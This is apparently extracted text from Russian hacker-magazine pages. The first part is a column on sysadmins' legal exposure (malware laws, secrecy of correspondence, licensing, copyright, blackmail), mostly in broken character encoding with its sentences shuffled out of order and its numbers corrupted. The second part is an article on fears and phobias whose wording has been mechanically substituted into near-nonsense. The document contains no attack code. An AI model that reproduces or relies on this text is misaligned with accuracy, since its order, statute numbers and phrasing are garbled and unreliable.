(ìóçûêà.  îáëàñòè IT òî è äðóãîå ìîæíî îñóùåñòâèòü íàæàòèåì íåñêîëüêèõ êëàâèø. Ïîýòîìó íàêàçàíèÿ çà ñîîòâåòñòâóþùèå íàðóøåíèÿ äîëæíû ïîñòîÿííî óæåñòî÷àòüñÿ. îòâå÷àòü äîëæåí òîò. Òî è äðóãîå èìåíóåòñÿ «ñàáîòàæ». Òî ëè Âîæäü âñå âåðíî ðàññ÷èòàë.ru/intlaw/crime/faq. À âîò óãîëîâíóþ ðàçðåøàåòñÿ âîçëàãàòü òîëüêî íà ÷åëîâåêà. Ñ êàæäûì ãîäîì âñå áîëüøå. 0-3 ñò. ×àùå âèíó ñâàëèâàþò (òîæå ïî äîëæíîñòè. Ïîýòîìó ïîïûòêè îáÿçàòåëüíî íàéòè âèíîâíîãî ïðîäîëæàþòñÿ. ÷åì âñÿêèå êîìïüþòåðíî-òåõíè÷åñêèå ýêñïåðòèçû è çàêëþ÷åíèÿ ñïåöèàëèñòîâ. Ãðàæäàíñêóþ îòâåòñòâåííîñòü ìîæåò íåñòè êàê ôèçëèöî. Îäíè ñâîäÿòñÿ ê íåèñïîëíåíèþ îáÿçàííîñòåé. êîòîðàÿ ñâåäåò íà íåò ðîëü ÷àñòíîé ñîáñòâåííîñòè â ÑÑÑÐ. êëàññîâàÿ áîðüáà äîëæíà ïîñòîÿííî îáîñòðÿòüñÿ. æåëàþùèõ âçÿòü íà ñåáÿ îòâåòñòâåííîñòü çà êîíòðàôàêò. Åñëè íå íàéäóò ïîòåðïåâøåãî (åãî ïîëíîìî÷íîãî ïðåäñòàâèòåëÿ â Ðîññèè). ïðè íåîáõîäèìîñòè çà÷òóòñÿ â îáùóþ ñóììó íàðóøåíèé. Òàê ÷òî. Êàê ëîãè÷íî ðàññóäèë òîâàðèù Ñòàëèí â 0928 ãîäó.

Ñîâñåì íåäàâíî ïðèáàâèëñÿ åùå îäèí âèä — òàê íàçûâàåìàÿ èíñàéäåðñêàÿ èíôîðìàöèÿ. Ñòîèò ëè íàïîìèíàòü. Èì óäàëîñü â êîíöå êîíöîâ äîêàçàòü ñâîþ íåâèíîâíîñòü (íå áåç ñîäåéñòâèÿ àâòîðà).html). ICQ è ïðî÷èå èíòåðíåò-êîììóíèêàöèè. ÷. ïîäëåæàùåé îáÿçàòåëüíîé çàùèòå (ñïèñîê êîíêðåòíûõ òàéí ìîæíî íàéòè. Êàê èçâåñòíî. Âñå ýòî — îáúåêòû èíòåëëåêòóàëüíîé ñîáñòâåííîñòè. ïåðñîíàëüíûå äàííûå. óæå ïîçäíî. âïðî÷åì. Òàêèõ þðèäè÷åñêèõ ìèí çàìåäëåííîãî äåéñòâèÿ òèïè÷íûé ñèñàäìèí îñòàâëÿåò çà ñîáîé êó÷è. ôàêòè÷åñêè çàùèòèòü äàííûå ìîæíî áåç îôîðìëåíèÿ ïðåäïèñàííûõ ôîðìàëüíûõ ïðîöåäóð è áóìàã. ÿâëÿåòñÿ ëè ïðîãðàììà âðåäîíîñíîé.com/55585. Íî çäåñü ñòðîãîñòü çàêîíà èãðàåò óæå íà äðóãóþ ñòîðîíó. 0 ñò. íà ñóäåáíîì çàñåäàíèè. 0 ñò. Èõ âïîëíå ìîæåò íàáðàòüñÿ íà 00 000 ðóáëåé (óãîëîâíàÿ îòâåòñòâåííîñòü). òî åñòü êîíôèäåíöèàëüíîé èíôîðìàöèè. äàæå åñëè îíà íå êîíôèäåíöèàëüíà. êàê íà÷àëüíèê òðåáîâàë îò àäìèíà ïîñòàâèòü ïðîãðàììó-øïèîí êîìó-òî èç ïîä÷èíåííûõ. Îïðàâäàòüñÿ îò òàêîãî îáâèíåíèÿ äîñòàòî÷íî ñëîæíî â ñèëó ïîëíîãî îòñóòñòâèÿ ñïåöèàëüíûõ çíàíèé ó ìèëèöèè è ñóäåé. Áûë èíòåðåñíûé ñëó÷àé . 073 ÓÊ) — ýòî äåÿíèå. à äàëüøå óæå òðóäíåå. íî ðîññèéñêàÿ òåõíèêà åùå íå íàñòîëüêî èíòåðíåòîçàâèñèìà. êîíñòèòóöèè óñòðîåíû íåìíîãî èíà÷å. Òðåáóåòñÿ ïèñüìåííîå (è ïðèòîì äîáðîâîëüíîå) ñîãëàñèå àáîíåíòîâ. ÷òî äåëàòü ýòî íàäî êàê ìîæíî ðàíüøå. è îíî â íåêîòîðûõ XÀÊÅÐ 00 /141/ 00 . óòðàòó. ïîêà «áîëåçíü» åùå íå çàïóùåíà. èç êîòîðûõ ýòî çàáëóæäåíèå ïî÷åðïíóòî. ïî÷òà ðåäàêòîðà ðóáðèêè: ìû ïðîäîëæèì ðàññìàòðèâàòü òåìó ðèñêîâ ñèñòåìíîãî àäìèíèñòðàòîðà áîëåå ïîäðîáíî. СЛУЖЕБНОЕ ПРОИЗВЕДЕНИЕ Ýòîò ðèñê òàêæå ñâÿçàí ñ àâòîðñêèìè ïðàâàìè. ñèñàäìèí â ñâîåé ðàáîòå èíîãäà èñïîëüçóåò èíûå ïðîãðàììû äâîéíîãî íàçíà÷åíèÿ: êåéãåíû. íî ÷åãî èì ýòî ñòîèëî! Åñëè ïðîãðàììèñò íå òàê èçâåñòåí è íå íàñòîëüêî ñîñòîÿòåëåí. ïðèíåñòè âðåä ìîæåò âïîëíå çàêîííàÿ ïðîãðàììà). Óñòàíîâèòü. íåïðàâîìåðíîå èñïîëüçîâàíèå) ýòîé èíôîðìàöèè ïðåäóñìîòðåíà äàëåêî íå âñåãäà. Êñòàòè ãîâîðÿ. ñò. Ïðàâà íà íèõ ïðèíàäëåæàò ïðåäïðèÿòèþ. Íåáîëüøèå øåëë-ñêðèïòû. ñîäåðæàíèå êîòîðûõ òàê èíòåðåñíî äëÿ òèïè÷íûõ íà÷àëüíèêîâ.SYN/ACK ñòàòüè ÷àñòåíüêî âûñòóïàåò â ðîëè ýêñïåðòà èëè ñïåöèàëèñòà ïî òàêèì óãîëîâíûì äåëàì.òåëåôîííûõ ïåðåãîâîðîâ. È íàîáîðîò. íàñêîëüêî òåáå íðàâèòñÿ èëè íå íðàâèòñÿ ïîÿâëåíèå «íå-òåõíè÷åñêîé» èíôîðìàöèè â ðàìêàõ ýòîé ðóáðèêè. Íî çàùèòèòü ïîäñóäèìîãî î÷åíü òðóäíî — êàê ïðàâèëî. Ïîëó÷åíèå ïðèêàçà íå îñâîáîæäàåò èñïîëíèòåëÿ îò óãîëîâíîé îòâåòñòâåííîñòè. Ñóùåñòâóåò ðàñïðîñòðàíåííîå çàáëóæäåíèå. Äî ñèõ ïîð âòîðàÿ ÷àñòü íè ðàçó íå ïðèìåíÿëàñü. òåëåãðàôíûõ è èíûõ ñîîáùåíèé». Äðóãîé âàðèàíò òîé æå ñêàçêè — ÷òî ðàáîòíèêà ÿêîáû äîñòàòî÷íî îôèöèàëüíî óâåäîìèòü. Åñëè íå ïðîïèñàíà. ñìåíèòü ìåñòî ñëóæáû. òû âñåãäà ìîæåøü âûñêàçàòüñÿ íà http://group. à â ñëó÷àå òðîÿíñêîé ïðîãðàììû ýòî òàê. åñëè îí óñòàíîâèò íà êîìïüþòåð ðàáîòíèêà òðîÿíñêóþ øïèîíñêóþ ïðîãðàììó — áîëü- Îò ðåäàêöèè: ãîëîñóé èëè ïðîèãðàåøü Î òîì. òóò: http://infowatch. À âîò îòâåòñòâåííîñòü çà íàðóøåíèå ïðåäóñìîòðåííîãî ïîðÿäêà åå çàùèòû — îáÿçàòåëüíî. Ïîñëå îêîí÷àíèÿ ñëåäñòâèÿ. ïîìî÷ü ïðàêòè÷åñêè íå÷åì. È íàîáîðîò. ñíèôåðû.  ÑØÀ. Îñîáåííî — áåç áóìàã. íî îòíþäü íå âðåäîíîñíûå ïðîãðàììû (àõòóíã — âðåäîíîñíîé ÿâëÿåòñÿ íå ëþáàÿ ïðîãðàììà. 0 ñò. 02 ÓÊ). SQL-ôóíêöèÿ. ïðè÷èíÿþùàÿ âðåä. à çàîäíî êîñíåìñÿ è íåêîòîðûõ äðóãèõ ïðàâîâûõ âîïðîñîâ ôóíêöèîíèðîâàíèÿ èíôîðìàöèîííûõ ñèñòåì è ëþäåé. åãî èíòåëëåêòóàëüíàÿ ñîáñòâåííîñòü èñïðàâíî ðàáîòàåò íà ñåðâåðå ïðåäïðèÿòèÿ è ïðè ýòîì ÿâëÿåòñÿ êîíòðàôàêòíîé. Ïðèêîë â òîì. êîãäà ñòàòüþ 073 ðèñóþò áåç ëþáûõ íà òî îñíîâàíèé çà âñÿêèå «íåõîðîøèå». íàêàçóåìîå â ñëó÷àå óìûøëåííîãî åãî ñîâåðøåíèÿ. ÷òî óòå÷êà ìîæåò ïðîèçîéòè íåñìîòðÿ íà ñîáëþäåíèå âñåõ ïîëîæåííûõ ïðàâèë. 0295 ÃÊ ÐÔ). êîãäà îí ðåøèë óâîëèòüñÿ. Íàïðèìåð. ВРЕДОНОСНЫЕ ПРОГРАММЫ Ñîçäàíèå è èñïîëüçîâàíèå âðåäîíîñíûõ ïðîãðàìì (÷. òî âñå ïðàâà îñòàþòñÿ ó àâòîðà. Ñèñàäìèí ìîã óæå è ñàì çàáûòü îá ýòîì. ìàêðîñû äëÿ MS Office. êàêàÿ-íèáóäü ó÷åòíàÿ ÁÄ è âåá-èíòåðôåéñ ê íåé. ñàìîñòîÿòåëüíî ðàçîáðàâøèñü âî âñåõ òåõíèêî-ïðàâîâûõ òîíêîñòÿõ âîïðîñà. ТАЙНЫ Çàêîíîäàòåëüñòâî ïðåäóñìàòðèâàåò íåñêîëüêî äåñÿòêîâ âèäîâ òàéí. ïîäáîðùèêè ïàðîëåé. êàê â îôèñ ïðèøëè «ñ ïðîâåðêîé» èëè óæå ñ ïîñòàíîâëåíèåì íà îáûñê.  ýòîì ñëó÷àå âñÿ òåêóùàÿ èñòåðèÿ ïî ïîâîäó ïèðàòñòâà è âñå ïåðåêîñû â çàêîíîäàòåëüñòâå áóäóò èãðàòü íà ñòîðîíå àâòîðà. Ãîëîñóé! Òðåáóé! Ïðåäëàãàé! Êðîìå òîãî. íå ïðèíèìàþùèõ âñåðüåç òåðìèí «ïðàâà ÷åëîâåêà». à çàîäíî è â Ðîññèè. 132 øèíñòâî ïðîãðàìì ýòîãî êëàññà ÿâëÿþòñÿ âðåäîíîñíûìè. êîãäà ïîä ñòàòüþ çà âðåäîíîñíûå ïðîãðàììû ïîïàëè àâòîðû õîðîøî èçâåñòíîé è ïîïóëÿðíîé ïðîãðàììû «KGB Spy». åñëè ïðèêàç çàâåäîìî íåçàêîííûé (÷. Âñÿêîìó ïîíÿòíî. åñëè â òðóäîâîì äîãîâîðå ïðîïèñàíà îáÿçàííîñòü ðàáîòíèêà ñîçäàâàòü òàêèå ïðîãðàììû (ýòî íàçûâàåòñÿ «ñëóæåáíîå ïðîèçâåäåíèå».livejournal.11 ÊîÀÏ).ru òîæå íàõîäèòñÿ â òâîåì ïîëíîì ðàñïîðÿæåíèè. îí ìîæåò è íå îïðàâäàòüñÿ îò îáâèíåíèé. íî åãî ñêðèïò. Èëè íå õîòåòü çíàòü. Íî íà ðîäèíå ïðàâ ÷åëîâåêà — â Åâðîïå. ñ íèìè ðàáîòàþùèõ. Íà ïðàêòèêå äîñòàòî÷íî ìíîãî ñëó÷àåâ. 03 Êîíñòèòóöèè). íî ñëåäîâàòåëü è åãî «êàðìàííûé» ýêñïåðò ìîãóò ýòîãî íå çíàòü. äî íàçíà÷åíèÿ ýêñïåðòèçû. ðàçðóëèòü ñèòóàöèþ âñòàíåò ñóùåñòâåííî äîðîæå. «Òÿæêèå ïîñëåäñòâèÿ» — ýòî íå÷òî íàïîäîáèå ïîêàçàííîãî â ôèëüìå «Êðåïêèé îðåøåê-4». 03. íàïðèìåð. îäíîñòðî÷íûé Java-ñêðèïò íà âåá-ñòðàíè÷êå è òàê äàëåå. àäìèíó òðóäíî îáîéòèñü áåç ñîçäàíèÿ ñîáñòâåííûõ ïðîãðàìì. «Èíûå» — ýòî êàê ðàç ýëåêòðîííàÿ ïî÷òà. ìîæíî. Êîå-÷òî ìîæíî ñäåëàòü íà ýòàïå ïðåäâàðèòåëüíîãî ñëåäñòâèÿ. Áóäó÷è ïðàâîîáëàäàòåëåì. Íî åñòü îòâåòñòâåííîñòü çà íàðóøåíèå óñòàíîâëåííûõ ïðàâèë îáðàáîòêè ïåðñîíàëüíûõ äàííûõ (ñò.ru. Îòâåòñòâåííîñòè çà èõ óòå÷êó (ðàçãëàøåíèå) íåò. 0 òîé æå ñòàòüè) òîëüêî â ñëó÷àå òÿæêèõ ïîñëåäñòâèé. Îíè âðåäîíîñíûìè íå ÿâëÿþòñÿ. Ïî íåîñòîðîæíîñòè îíî áóäåò ïðåñòóïëåíèåì (÷. íè ïðàâî ñîáñòâåííîñòè íà ñðåäñòâà ñâÿçè íå äàåò ðàáîòîäàòåëþ âîçìîæíîñòü ïåðëþñòðèðîâàòü ýëåêòðîííóþ ïî÷òó è äðóãèå ñëóæåáíûå êàíàëû ñâÿçè. ÷òî îòâåòñòâåííîñòü çà óòå÷êó (ðàçãëàøåíèå.xakep. ÷òî ñëóæåáíûå êîììóíèêàöèè ÿêîáû ìîæíî ïðîñìàòðèâàòü/ïðîñëóøèâàòü áåç ñîãëàñèÿ ðàáîòíèêà. Ê òîìó âðåìåíè. äåëî îáñòîèò äåéñòâèòåëüíî òàê. åå ñëåäóåò çàùèùàòü. Ñèñàäìèí ðèñêóåò ïîïàñòü ïîä 073-þ ñòàòüþ. Äðóãàÿ îïàñíàÿ äëÿ ñèñàäìèíà òàéíà — ýòî òàéíà ñâÿçè (ôîðìàëüíî èìåíóåìàÿ «òàéíà ïåðåïèñêè. ïîñëå ÷åãî ïåðëþñòðàöèÿ ñòàíîâèòñÿ çàêîííîé. Êðîìå òîãî. Çàùèùàòüñÿ îò ýòîãî ðèñêà âûãîäíåå âñåãî ïðè íàéìå ðàáîòíèêà. Ïèøè òóäà è. Èìåííî â ïîñëåäíåì íàðóøåíèè ñîäåðæàòñÿ îñíîâíûå ðèñêè. Ñàìàÿ ýôôåêòèâíàÿ çàùèòà îò íåñïðàâåäëèâîãî (à òàêæå è ÷àñòè÷íî ñïðàâåäëèâîãî) îáâèíåíèÿ â íàðóøåíèè àâòîðñêèõ ïðàâ íà ÏÎ ìîæåò áûòü îêàçàíà äî òîãî. Àâòîðó íåñêîëüêî ðàç ðàññêàçûâàëè çíàêîìûå è êëèåíòû. åñëè íàøå ñåãîäíÿøíåå íà÷èíàíèå âñòðåòèò îäîáðåíèå îïðåäåëåííîãî êîëè÷åñòâà ÷èòàòåëåé. à ìîæíî îáðàòèòüñÿ ê ñïåöèàëèñòó. áûâøèé ðàáîòíèê (è äàæå íå áûâøèé) ìîæåò ïðåäúÿâèòü ïðåòåíçèè ê íàðóøèòåëþ àâòîðñêèõ ïðàâ. à óæ íà ãðàæäàíñêóþ õâàòèò â ëþáîì ñëó÷àå. Íî íà ïðàêòèêå ïðîâåðÿþò êàê ðàç äîêóìåíòû è øòðàôóþò çà èõ îòñóòñòâèå. ñêàíåðû. òî åñòü íà ðîäèíå ôèëüìîâ è ïðèêëþ÷åí÷åñêèõ ðîìàíîâ. Íè óâåäîìëåíèå.

html). ïîðíîãðàôèåé è ïðî÷èìè îíëàéíîâûìè è îôôëàéíîâûìè ãðåõàìè. ñëó÷àè. êîãäà àäìèíîâ ïðèâëåêàëè ê îòâåòñòâåííîñòè çà ñëèøêîì ðåâíîñòíóþ èëè ÷åðåñ÷óð óñåðäíóþ çàùèòó ñâîèõ ðåñóðñîâ (è ïîäîáíûõ ñëó÷àåâ áûëî ãîðàçäî áîëüøå äâóõ). êîãäà ñëåäóåò èìåòü ëèöåíçèþ. à èíîé ðàç áåç ñîîòâåòñòâóþùèõ ñâÿçåé è âîîáùå íåâîçìîæíî. Íî âñå ÷àùå ïîïàäàþòñÿ ñðåäè íèõ ïåðñîíàæè ñ ïðîêà÷àííûì ñêèëîì «ïðàâî/þðèñïðóäåíöèÿ». íî òå îòíîøåíèÿ. òðåáóþùèõ ëèöåíçèè. íå ñóäüÿ è íå ïàëà÷. Íå èìåÿ ñîîòâåòñòâóþùåãî îáðàçîâàíèÿ. À ýòè îðãàíû ñêëîííû ðóêîâîäñòâîâàòüñÿ îôôëàéíîâûìè çàêîíàìè è ïîëíîñòüþ èãíîðèðîâàòü «ñåòåâûå íîðìû» è ïîíÿòèÿ. Äåëàòü òàê íå ñòîèò. òàê òåì áîëåå áóäåò ñäåëàí îòâåòñòâåííûì çà âñå. Ïîýòîìó íå íàäî ñòåñíÿòüñÿ ñïðàøèâàòü ñîâåòà è ó÷èòüñÿ. Îäíàêî çà ðàáîòó áåç ëèöåíçèè ïðåäóñìîòðåíà óãîëîâíàÿ îòâåòñòâåííîñòü (ñò. À óæ åñëè ïîääàëñÿ íà óãðîçû. Ïîäðîáíîñòè îòäàíû íà îòêóï âåäîìñòâàì. îïðåäåëåíû â çàêîíàõ íå âïîëíå ÷åòêî. Êðîìå òîãî. òåõíè÷åñêàÿ çàùèòà èíôîðìàöèè è íåêîòîðûå èíûå âèäû äåÿòåëüíîñòè. êàæäûì çàáëîêèðîâàííûì ïàêåòîì. Èíîãäà âíåøíèå çëîóìûøëåííèêè. ðàáîòíèêè-ïðàâîçàùèòíèêè íàõîäÿòñÿ ðåäêî. êàæäîé êîìàíäîé â êîíñîëè îí âîçäåéñòâóåò íà îòíîøåíèÿ ìåæäó ëþäüìè. îáñëóæèâàíèå øèôðîâàëüíîé òåõíèêè. Âûèãðàòü ó ïðîææåííûõ áþðîêðàòîâ íà èõ ïîëå ïî èõ ïðàâèëàì òåõíàðü íå ìîæåò. äàæå åñëè îí è íå âèíîâàò. òî ñèñàäìèí — ïåðâûé êàíäèäàò â îáâèíÿåìûå. Ê òàêîâûì çàíÿòèÿì îòíîñÿòñÿ: óñëóãè ñâÿçè. à êîãäà íåò. êîòîðûå çàòðàãèâàþò ïðàâà è ñâîáîäû ëè÷íîñòè. ÔÑÁ èëè ïîäà÷åé èñêîâîãî çàÿâëåíèÿ â ñóä. Âåäîìñòâà îïðåäåëÿþò ãðàíèöû ëèöåíçèðîâàíèÿ òàê. ðèñêè ñèñàäìèíà ëåæàò â ïðàâîâîé ñôåðå. Ïî ýòîé ñòàòüå ÷àùå âñåãî ïðèâëåêàþò ðóêîâîäèòåëÿ ïðåäïðèÿòèÿ. êàæäîé áóêâîé â êîíôèã-ôàéëå. ЗАКЛЮЧЕНИЕ Òîëüêî ñ ïåðâîãî âçãëÿäà ñèñàäìèí âçàèìîäåéñòâóåò ñ òåõíèêîé. Ïîýòîìó ðèñêóåò îñòàòüñÿ âèíîâàòûì. íî ñèñàäìèí òîæå ìîæåò ïîïàñòü ïîä ðàçäà÷ó. à îòäàâøèé ïðèêàç íà÷àëüíèê ìîæåò è îòâåðòåòüñÿ. Âîò åãî è ïðåññóþò. Äàëåêî íå âñå ñðåäñòâà çàùèòû ïðèåìëåìû. Òî åñòü ó÷èíèòü ðàçäåëåíèå ïîëíîìî÷èé. À êòî ó íàñ ïî óìîë÷àíèþ èìååò âûñøèé äîïóñê è ìàêñèìàëüíûå òåõíè÷åñêèå ïîëíîìî÷èÿ? Àäìèí. Íå ïðîñòî îòíîøåíèÿ. îñîáåííî åñëè ôàêòè÷åñêóþ äåÿòåëüíîñòü îñóùåñòâëÿë îí. ДРУГИЕ À åùå ñèñàäìèí èíîãäà ñòàíîâèòñÿ îáúåêòîì øàíòàæà. È îíè ìîãóò ïîñòàâèòü áîðöóíà íà ìåñòî îðèãèíàëüíûì ñïîñîáîì — íàïðàâëåíèåì çàÿâëåíèÿ â ìèëèöèþ. Áîðÿñü ñî ñïàìîì. Åñëè íà òàêîì íàðóøåíèè âñå-òàêè ïîéìàþò. 071 ÓÊ). DoS-àòàêàìè. Ïîýòîìó òàéíà ñâÿçè íàðóøàåòñÿ íà ðîññèéñêèõ ïðåäïðèÿòèÿõ ñïëîøü è ðÿäîì. à òàêæå äåíüãè. êîòîðîå è ðåêîìåíäóåòñÿ ñòàíäàðòàìè ïî èíôîðìàöèîííîé áåçîïàñíîñòè. Ïîëó÷àòü èõ äîëãî è ìóòîðíî. òåõíàðè ÷àñòî èçëèøíå óñåðäñòâóþò. íàðóøàÿ ïðàâà äðóãèõ ëþäåé — ñàìèõ çàùèùàåìûõ ïîëüçîâàòåëåé èëè âîîáùå ëþäåé íåïðè÷àñòíûõ. à ïîðîé è ïðåäñòàâèòåëè âíóòðåííèõ ãðóïïèðîâîê. êàê ïðàXÀÊÅÐ 00 /141/ 00 âèëî. È ïåðåõîäÿò ãðàíü çàêîíà. Êàê âèäíî. çàâëàäåòü êîììåð÷åñêîé òàéíîé. íåêîòîðûå çëîóìûøëåííèêè è íà÷èíàþò àòàêó ñ ýòîãî çâåíà. è èíîãäà ïåðåäâèãàþò èõ áåç ïðåäóïðåæäåíèÿ. ÷òî çàêîíû ýòè ìàññîâî íàðóøàþòñÿ. ïîñóëû è âçÿòêè. Íàñëóøàâøèñü êâàçèãëóáîêîìûñëåííûõ èçðå÷åíèé â äóõå «÷åëîâåê — ñëàáåéøåå çâåíî çàùèòû». ðàçîáðàòüñÿ â íèõ òðóäíî. óãðîç èëè ïîäêóïà ñî ñòîðîíû æåëàþùèõ ïðîíèêíóòü â èíôîðìàöèîííóþ ñèñòåìó ïðåäïðèÿòèÿ. Íà ñàìîì äåëå êàæäîé íàñòðîéêîé. íå ñïîñîáåí.Относительная возможность различных типов саботажа на IT ñëó÷àÿõ áóäåò íåäåéñòâèòåëüíî (ïîäðîáíåå — http://forensics. Äåéñòâåííûé ñïîñîá çàùèòû äëÿ àäìèíà — íå èìåòü íåîãðàíè÷åííîãî äîñòóïà êî âñåé êîíôèäåíöèàëüíîé èíôîðìàöèè. Îòíîøåíèÿ. õîòÿ ÷àñòåíüêî è íîðîâèò âûïîëíÿòü âñå òðè ðîëè îäíîâðåìåííî. êîòîðûå è ëèöåíçèðóþò òîò èëè èíîé âèä äåÿòåëüíîñòè. êîòîðûå çàùèùåíû çàêîíîì. åãî è ïîäêóïàþò. Êîíå÷íî. Àäìèíèñòðàòîð è äàæå ðàáîòíèê èíòåðíåò-ïðîâàéäåðà — ýòî íå ñëåäîâàòåëü. Íåóäèâèòåëüíî. Îòâå÷àòü íà òàêèå âûçîâû è îðèåíòèðîâàòüñÿ â ðàñêëàäå ñèë (÷òîá âîâðåìÿ ñòàòü íà ñòîðîíó ïîáåäèòåëÿ) òåõíè÷åñêèé ñïåöèàëèñò. áîëüøèíñòâî ïîëüçîâàòåëåé — íè÷òîæíûå ÷åðâè è áåñïðàâíûå ðàáû. Òàêæå íà ïàìÿòè àâòîðà áûëè ñëó÷àè. ЛИЦЕНЗИРУЕМАЯ ДЕЯТЕЛЬНОСТЬ Â Ðîññèè ñóùåñòâóåò äîñòàòî÷íî ìíîãî âèäîâ äåÿòåëüíîñòè. Ïðàâäà.ru/ zi-ts. z 133 . Äàæå íå íàäåéòåñü. ôèøèíãîì. êàê èì óäîáíî.

страх непонятно чего. то убирать иррациональна. как при других эмоциях. в таком случае ты предположишь. ужас. веселье. равным образом они вполне разнообразны.ru PSYCHO: ÁÎß Ò ÜÑ ß Í Å Ë Ü Çß È Ã ÍÎÐÈ Ð ÎÂÀÒ Ü Ñòðàõè. сего отнюдь не понимает сам по себе боящийся. постоянно напоминают касательно себе. страсть никак не возникает получи и распишись пустом месте. руководят действиями. кушать неуверенность в своем профессионализме — твоя милость ужасаешься с вида начальника да и оный и другой число с замиранием сердца равным образом холодом на солнечном сплетении ждешь новости об увольнении. колдунам. равно как отзываться возьми то. страх устойчива. что-то относительно него неграмотный приближенно подумают или плохо оценят… Именно от такими проблемами людишки приходят ко психологам. которые до неопытности можно прозвать фобиями: необоснованный страх. вроде да пользу кого других эмоций. Ôîáèè Фобия (phobos) во переводе от греческого означает опасение alias боязнь. женщина. опасение. Хичкок. фобии а оказывают давление для бытье человека. лишенный оснований. когда-когда человеку (или животному) несколько угрожает. стихийных бедствий. нет ощущения своей сокровище — твоя милость боишься мнения равно оценки окружающих. — в отличие с обычного страха. Страх присущ утилитарно любому мыслящему существу нашей планеты. Такая же. Невротический. во данном случае является фобией. животном страхе — его природной причиной является инстинкт самосохранения. Но человеку характерно развиваться. alias возлюбленный стал свидетелем ситуации. в духе правило. безвыгодный можем прикинуть. симпатия практически всю зарплату тратит для такси. скука. Ñòðàõ Страх — сие эмоция. равно как радость. высотники равно другие. умножаться религиозно равно эмоционально. Всего чуть миллиончик парение вспять страхи у людей были исключительно инстинктивными — когда человек боялся грома. во итоге возникает состояние неопределенности. паника. выглядят по-иному (незнакомо). отнюдь не знаешь. Но они спокон века есть. Еще одной причиной страхов является неизвестность: твоя милость малограмотный знаешь. хищников. в церковь. принимать страхи. и как у любого явления. Боясь прорасти поплоше по какому-либо изо параметров. волнение. от случая к случаю не без; каждым годом увеличивается величина новых фобий на словарях и количество новых пациентов у психологов и психиатров. будто на нее до этого времени сезон приценивающе смотрят люди. В целом. намного ужаснее будто ясный путь увольнения. равным образом круглым счетом же. Почему народище много раз боятся разных малоизвестных животных либо насекомых? Потому почто они на корне отличаются с нас. 134 кары господней. почто его в бывалошное время получи «зебре» сбила (или незначительно далеко не сбила) машина. Но это просто-напросто только лишь страхи. Страх имеет рациональные корни. видок равным образом аксессуары со окружающими. вызывающих неврозный страх. Причин. èëè ïðèÿòíàÿ äîçà àäðåíàëèíà? Если бы неграмотный сие «замечательное» чувство. что произойдет. чья операция связана не без; риском — минус жизни. инстинктивно прорезывающийся страх. Например. Теперь паника огня отходит держи дальнейший план. возьми хоть равным образом осознаваемый страх. от ним коптеть отпустило — так-таки причины осознаются. что такое? неграмотный успеешь своевременно не будь дурак равно приобрести верное решение. XÀÊÅÐ 00 /141/ 00 . с каких щей индивидуальность боится взгляда куклы? В первую очередь. И беспричинно же. Но на современном языке страх — сие поодаль безвыгодный попросту страх. которое во большинстве случаев порождает страх. да особенно — в нашем веке. про него характерны специальные обстоятельства возникновения: во ситуациях. наш брат что до них ничего не знаем. огня. Ïðèðîäà ñòðàõîâ Если барабанить в рассуждении естественном. ôîáèè è èõ âàðèàöèè: ýìîöèè. великое множество. а водители. А во не без; фобиями сложнее: как бы объяснить. во сие миг происходят характерные физиологические равным образом химические реакции на организме. причем необязательно предубеждённо — рядом опасении или предвкушении угрозы равным образом возникает это леденящее душу ощущение. именно почему что приступы фобий сопровождаются паническими атаками. постоянна равным образом никак не имеет осознаваемых причин. разве лицо боится перешагивать с дороги по части пешеходному переходу. со точки зрения психотерапевта. Шьямалан равно прочие создатели хоррора на кинематографе остались бы без участия работы. Резко равным образом неожиданно залаяла выжлец — засим твоя милость всю жизнь можешь их избегать. и. Эмоция страха колеблется от слабого вплоть до сильного. которая боится ездить в общественном транспорте (разновидность социофобии). ась? тебя ждет. только. боишься.UNITS Оксана «Oriyana» Андреева если кого-то переехал автомобиль на этой зоне. боязнь. благодаря этому аюшки? ей кажется. равным образом на этом вничью невыгодный отличался от животных. да на зависимости с этой характеристики симпатия меняет название: психастения (неосознаваемый страх). îòðàâëÿþùèå æèçíü. сильная тревожность. у развития убирать домашние негативные стороны — вкупе не без; продвинутостью у человека появился ужасть невротический. приводя для абсурдному поведению. безвыгодный говоря сейчас по части психологических. Например. испуг. побольше интенсивная равным образом славно ощущаемая. сравнивая ее одежду. почто они думают и вроде себя ведут.

— сколько равным образом следовало доказать. почему бояться. инсультофобия. 135 . которую предложил знатный психиатр. либо ищешь варианты изменить ситуацию. • агорафобия — малодушие открытого пространства. зацикливающиеся. симпатия попросту подготовился получай случай такого «посещения» равно знает точно. сходственные страхи. которые особа помнит равно осознает. Как правило. Причем то и дело индивидуальность боится невыгодный абстрактной смерти. наравне будет действовать. Как видишь. канцерофобия (боязнь засопливеть раком). бациллофобия (страх патогенных микроорганизмов). Ñòðàõè. используется подмена выбора: где бы «бежать иначе говоря безвыгодный пробегать для охот- ÂÈÄÛ ÑÒÐÀÕÎÂ È ÔÎÁÈÉ Страхов да фобий куда много. от другой породы — десятая спица изо сих людей отнюдь не знаком. осесть для рельсы накануне поездом метро. а конкретной: скончаться ото определенной болезни. аюшки? четвероногое не похоже ли в здравом уме побежит встречу охотнику. толпа и замкнутое пространство. что страх — сие субъективная эмоция. Варианты агорафобии: страсть ехать вне сопровождающих. Таким людям не возбраняется всего-навсего посочувствовать. по левую сторону да направо — бушует полымя сиречь слышен богатырский необычный шум. как бы правило. Эта страх особенно свойственна людям из приступами чего-либо: сердечные. почто тебя впереди ждет нечто плохое. часто неповторимый характер. который предварительно оленем зверобой со XÀÊÅÐ 00 /141/ 00 страшным ружьем. того невротиком воспринимается вроде эмоциональная чепуховость вокруг). Нет неопределенности — недостает страха. не ведь — не то боязнь чем-то заболеть. врачебный Карвасарский. О них автор сих строк поговорим чуть позже. или — или жуть напугаться чего-либо. ты сейчас малограмотный боишься. это касается малограмотный лишь только людей) века пользуются многие манипуляторы. так неграмотный боишься. индивидуальный. Такой особенностью психики живого существа (да-да. • гипсофобия — трепет высоты. так фобии как всегда довольно стандартны. твоя милость не без; ужасом ждешь визита отдела по борьбе со киберпреступностью? А неизвестно кто не боится. Но далеко не постоянно беспричинно попросту сверху самом деле. К таковой фобии склонны народище со высокой мнительностью. эдак как бы они спровоцированы какими-то реальными событиями. разве сотрудники Управления «К» заглянут для нему во гости. Группа танатофобии. Группа нозофобий. панические атаки. у него одна назначение — избежать опасности. ужас фигурировать средь толпы незнакомых людей (хотя. равным образом каждый индивид непосредственно себя придумывает. смерть через терракта. а в ту же минуту ваш покорный слуга приведу к иллюстрации без затей экземпляр срабатывания инстинкта самосохранения. Ты изумительно знаешь. Человек. Даже буде твоя милость 